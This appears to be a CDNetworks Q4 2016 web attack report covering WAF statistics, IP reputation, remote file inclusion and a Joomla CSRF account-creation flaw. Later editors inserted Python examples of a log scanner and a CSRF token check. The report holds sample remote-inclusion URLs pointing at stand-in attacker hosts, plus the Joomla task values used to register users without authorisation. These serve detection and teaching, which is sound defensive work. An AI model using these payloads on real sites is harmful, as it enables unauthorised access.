CDNetworks Q4 2016 Web Attack Analysis Report
Security Level: Public
February 2017
Security Service Team
Table of Contents
Introduction
Web Attack Analysis
  Part I. Web Hacking Statistics
  Part II. Web Hacking Cases
  Part III. Technical Analysis Data
Conclusion

Public. Copyright (c) CDNetworks. All Rights Reserved.
Introduction

CDNetworks provides a web hacking blocking service by applying a Web Application Firewall (WAF) to secure customers' web applications. This report aims to help our customers operate web applications more safely by sharing the results of our analysis of the web hacking types identified through CDNetworks' WAF during the fourth quarter of 2016.

Web Attack Analysis

Part I. Web Hacking Statistics

1. Language-specific

We found signs of attack on PHP (84%), JAVA (3%) and other languages (Python, etc., 13%). This distribution is attributed primarily to the exposure of vulnerabilities in public CMS products developed in PHP (WordPress, Joomla, etc.) and the attacks on them.

<Fig. 1> Web attacks by language (PHP 84%, JAVA 3%, other 13%)

2. Vulnerability Type-specific

SQL Injection, CSRF (Cross-Site Request Forgery) and XSS (Cross-Site Scripting) account for most of the attack attempts.
<Fig. 2> Web attacks by vulnerability type (CSRF 28%, SQL Injection 26%, XSS 13%, multiple vulnerabilities 10%, authentication bypass 6%, Remote Code Execution 5%, Local File Inclusion 3%, privilege escalation 3%, etc. 6%)

<Table 1> Vulnerability type

Secure Coding (CWE)                  OWASP Top 10                      Type                        Share
CWE-89                               A1                                SQL Injection               26%
CWE-94                               A1                                Remote Code Execution       5%
CWE-592                              A2, A7                            Authentication bypass       6%
CWE-269                              A2, A7                            Privilege escalation        3%
CWE-79                               A3                                XSS                         13%
CWE-98                               A4                                Local File Inclusion        3%
CWE-352                              A5                                CSRF                        28%
(comprehensive listing of CWE)       (comprehensive listing of OWASP)  Multiple vulnerabilities    10%
CWE-434, 23, 530                     A4, A6                            etc.                        6%

Vulnerabilities in the "etc." (Others) category include those related to file uploads/downloads and exposure of backup files.
Part II. Web Hacking Cases

1. Web Scraping

Web scraping is a technique for extracting data from websites by using an automation tool. The first figure shows that, without a WAF applied, the website's vulnerabilities are identified through attacks.

<Fig. 3> The vulnerability results using a web vulnerability analysis tool - 1

The second figure shows that the WAF blocks most of the attack attempts. For access by attack tools, whether a request is allowed or rejected is determined by recognising the rate limit (access frequency), a specific header (set-cookie) and a page value (javascript).

<Fig. 4> The vulnerability results using a web vulnerability analysis tool - 2
2. IP reputation

IP reputation services block attacks by using a blacklist of IPs with an attack history, drawing on the following database information.

<Fig. 5> IP reputation

Any access attempt from a blacklisted IP is blocked using the client_ip field identified through the WAF.

<Fig. 6> WAF detection information

The validation method for the relevant IP can be found simply by googling it.

<Fig. 7> Results of googling the IP validation method
Currently, a growing number of IPs are used by Mirai, a botnet that exploits IoT devices, but attempts to use such IPs can be detected and blocked through this rule. http://data.netlab.360.com/mirai-scanner

<Fig. 8> Mirai activity trend

3. Remote File Inclusion

Remote file inclusion is a technique that includes malicious remote pages in the application to execute commands and acquire privileges. As shown below, inclusion of a malicious site in the file parameter can be detected.

(Example) http://vulnerable_host/vuln_page.php?file=http://attacker_site/malicous_page

In the following case, an attempt to include a Russian domain in the _dc parameter of picturefill.min.js was detected and blocked.
<Fig. 9> WAF detection information

The reliability of the included domain was checked through a malicious file and URL analysis site (VirusTotal). It was not determined to be an actual attack, as none of the 68 anti-virus engines detected it.

<Fig. 10> Result of VirusTotal lookup
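The detection idea in this section, a query parameter whose value names a remote host, written out as a small log scanner. This is example code added here, not CDNetworks' WAF rule; the log format, the SAMPLE_LOG lines and the scan_log/remote_inclusion_params names are constructed for the example. It checks every parameter (so the _dc case is caught as well as file) and percent-decodes values before matching.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Constructed sample access-log lines (not taken from the report).
# Format: client_ip "METHOD request-target HTTP/x.y" status
SAMPLE_LOG = """\
198.51.100.7 "GET /vuln_page.php?file=http://attacker.example/malicious_page HTTP/1.1" 200
203.0.113.9 "GET /js/picturefill.min.js?_dc=//203.0.113.50/x.js HTTP/1.1" 200
192.0.2.4 "GET /index.php?page=about HTTP/1.1" 200
192.0.2.5 "GET /include.php?file=http%3A%2F%2F198.51.100.20%2Fshell.txt HTTP/1.1" 403
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) "(?P<method>\S+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})$')
# A value that starts with "scheme://" or a protocol-relative "//" names a remote host.
REMOTE_RE = re.compile(r"^(?:[a-z][a-z0-9+.\-]*:)?//", re.IGNORECASE)


def remote_inclusion_params(target: str) -> list[tuple[str, str]]:
    """Return the (name, value) pairs in the request's query string whose
    decoded value points at a remote host, whatever the parameter is called."""
    query = urlsplit(target).query
    # parse_qsl percent-decodes, so an encoded http%3A%2F%2F is caught as well.
    return [(name, value) for name, value in parse_qsl(query, keep_blank_values=True)
            if REMOTE_RE.match(value.strip())]


def scan_log(text: str) -> list[dict]:
    """Scan access-log lines and report requests carrying a remote-inclusion parameter."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that do not fit the expected format
        hits = remote_inclusion_params(m["target"])
        if hits:
            findings.append({
                "client_ip": m["ip"],
                "path": urlsplit(m["target"]).path,
                "params": hits,
                "status": int(m["status"]),
            })
    return findings


if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding)
```

A hit on a request that returned 200 (rather than 403) is the one worth triaging, since it was served instead of blocked.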
Part III. Technical Analysis Data

Cross-Site Request Forgery (CSRF) is a malicious attack that forces an end user of a web application to execute actions of the attacker's choosing by exploiting the site's vulnerabilities. CSRF takes place primarily when the cookies (authentication information) used to identify individual users are not handled according to their purpose and authority, so that the attacker can execute certain tasks or forge information by bypassing authorization. For example, the procedure for posting a message on a message board is usually (1) accessing the board, (2) clicking "Write", (3) writing the message and (4) posting it. But if posting a message is permitted without login, a large amount of spam can be posted to the board.

This document explores the process of analyzing vulnerabilities found in Joomla (a CMS tool for authoring homepages). Joomla 3.6.4 and previous versions have a vulnerability through which an arbitrary account can be created or admin authority acquired.

<Table 2> OWASP TOP 10-A8
OWASP Top 10                                  Result        Remarks
A8-Cross-Site Request Forgery (CSRF)          Vulnerable

<Table 3> CWE-352
Secure Coding (CWE)                           Result        Remarks
CWE-352: Cross-Site Request Forgery (CSRF)    Vulnerable

The above vulnerabilities arise primarily because a user can be added without authentication when register( ) in the source code (/com_users/controllers/user.php) is called.
<Fig. 11> user.php vulnerability code

The first attempt adds an arbitrary user by including registration.register in the task parameter value.

<Fig. 12> user.php exploitation - 1
The second attempt registers an admin by including user.register in the task parameter value.

<Fig. 13> user.php exploitation - 2

As shown below, a malicious user has been added.

<Fig. 14> Addition of an unauthorized user

Unlike the normal intended operation of an application, CSRF exploits abnormal paths. Such attacks are not detected through blackbox testing (web scanner, etc.) or whitebox testing (source code diagnosis); a consultant discovers these vulnerabilities through a direct attack on the related module. Then how are such vulnerabilities removed? The Secure Coding Guide distributed in Korea recommends changing the GET method to the POST method.
Source: JAVA Secure Coding Guide for e-gov Software Developers

<Fig. 15> Incorrect example regarding CSRF-safe code

But since POST data can be forged just as easily through a proxy tool, this example is incorrect. Instead of the above method, it is better to transmit an encrypted token to each critical page and validate the value on the server. The example below shows the secure coding method using the open csrffilter class.

<Fig. 16> CSRF filter
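As an added illustration of the two approaches just contrasted (example code written for this edit, not the csrffilter class from Fig. 16 and not Joomla's own code), the following Python sketch runs a Joomla-style task dispatch first behind a POST-only check and then behind a per-session random token re-validated on the server. Session, handle_register and the hidden field name _csrf are assumed names.

```python
import hmac
import secrets


class Session:
    """Minimal server-side session (assumed stand-in for a framework's session store).
    A fresh 256-bit random token is generated when the session is created."""

    def __init__(self) -> None:
        self.csrf_token = secrets.token_urlsafe(32)


def render_form(session: Session) -> str:
    """Embed the session's token in the critical page as a hidden field. A cross-site
    attacker cannot read this page, so it cannot learn the token."""
    return f'<input type="hidden" name="_csrf" value="{session.csrf_token}">'


def method_only_check(session: Session, method: str, form: dict) -> bool:
    """The inadequate fix: only require POST. Any client or proxy tool can send a POST."""
    return method == "POST"


def token_check(session: Session, method: str, form: dict) -> bool:
    """Require a matching token on every state-changing request; compare in constant time."""
    if method not in ("POST", "PUT", "PATCH", "DELETE"):
        return True  # safe methods must not change state, so no token is needed
    submitted = form.get("_csrf", "")
    return hmac.compare_digest(submitted.encode(), session.csrf_token.encode())


def handle_register(session: Session, method: str, form: dict, check) -> str:
    """Simplified task dispatch: only register when the chosen CSRF check passes."""
    if form.get("task") not in ("registration.register", "user.register"):
        return "ignored"
    return "user created" if check(session, method, form) else "blocked"


def demo() -> dict:
    session = Session()
    # Forged request: the attacker controls the body (so POST is trivial) but has no token.
    forged = {"task": "registration.register", "username": "attacker"}
    # Legitimate request: the token comes from the page rendered for this session.
    legit = dict(forged, _csrf=session.csrf_token, username="alice")
    return {
        "post_only/forged": handle_register(session, "POST", forged, method_only_check),
        "token/forged": handle_register(session, "POST", forged, token_check),
        "token/legit": handle_register(session, "POST", legit, token_check),
    }
```

The first result shows the POST-only rule letting the forged registration through, while the token rule blocks it and still admits the legitimate submission.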
Through the filter shown in Fig. 16, data forgery can be identified and blocked by re-validating, on the server, the <secure-random> value delivered to the page.

<Fig. 17> CSRF exploitation and protection cases

Conclusion

We have explored various web attack types and the exploitation of Joomla applications in Q4 2016 and found that continuous attack attempts have been made against our customers. As there are attempts to collect information through automated bots, as well as security incidents related to DDoS attacks such as GET flooding, it is essential to establish suitable security measures. CDNetworks' Cloud Security Service, a cloud-based web firewall, is an effective solution for web security as it provides multi-tier protection to block DDoS, access by automated bots, and attacks on web vulnerabilities.
About CDNetworks

CDNetworks is a global content delivery network (CDN) with fully integrated Cloud Security DDoS protection and web application firewall. Our mission is to transform the Internet into a secure, reliable, scalable, and high-performing Application Delivery Network. CDNetworks accelerates more than 40,000 websites and cloud services over a network of 200 global PoPs in established and emerging markets including China and Russia. We have been serving enterprise customers for 16 years across industries such as gaming, finance, ecommerce, high tech, manufacturing, and media. CDNetworks offices are located in the U.S., UK, South Korea, China, Japan, and Singapore. For more information, please visit: https://www.cdnetworks.com.sg

Copyright Statement

Copyright CDNetworks. All Rights Reserved. Copyright in this document is owned by CDNetworks, and you may not reproduce or distribute this document without the prior permission of CDNetworks. Information in this document is subject to change without notice.

Global Offices

Singapore: 51 Cuppage Road, #06-07, Singapore 229469, +65 6908 1198
US: 1919 S. Bascom Avenue, Ste. 600, Campbell, CA 95008-2220, +1 408 228 3700
EMEA: 85 Gresham Street, London EC2V 7NQ, +44 203 657 2727
Korea: 2F, 37, Teheran-ro 8-gil, Gangnam-Gu, Seoul (06239), +82 2 3441 0400
Japan: Nittochi Nishi-shinjuku Building, 8th Floor, 6-10-1 Nishishinjuku, Shinjuku-ku, Tokyo 160-0023, +81 3 5909 3369
China: F15-05 Tower B, Greenland Center, Science and Technology Business Area, Wangjing, Chaoyang District, Beijing, 100102, +86 10 8441 7749